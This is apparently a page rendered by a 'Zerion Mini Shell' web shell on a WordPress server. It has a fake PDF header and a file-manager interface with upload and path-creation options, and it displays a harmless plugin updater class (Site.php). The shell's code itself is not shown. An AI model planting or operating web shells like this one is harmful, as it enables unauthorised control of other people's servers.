%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/Plugin/Updater/
Upload File :
Create Path :
Current File : //var/www/cwg/wp-content/plugins/codepress-admin-columns/classes/Plugin/Updater/Site.php

<?php

namespace AC\Plugin\Updater;

use AC\Plugin;
use AC\Plugin\Updater;

class Site extends Updater {

	/**
	 * @var Plugin
	 */
	protected $plugin;

	/**
	 * @param Plugin $plugin
	 */
	public function __construct( Plugin $plugin ) {
		$this->plugin = $plugin;
	}

	/**
	 * @inheritDoc
	 */
	protected function update_stored_version( $version = null ) {
		$this->plugin->update_stored_version( $version );
	}

	/**
	 * @inheritDoc
	 */
	protected function is_new_install() {
		return $this->plugin->is_new_install();
	}

}

Zerion Mini Shell 1.0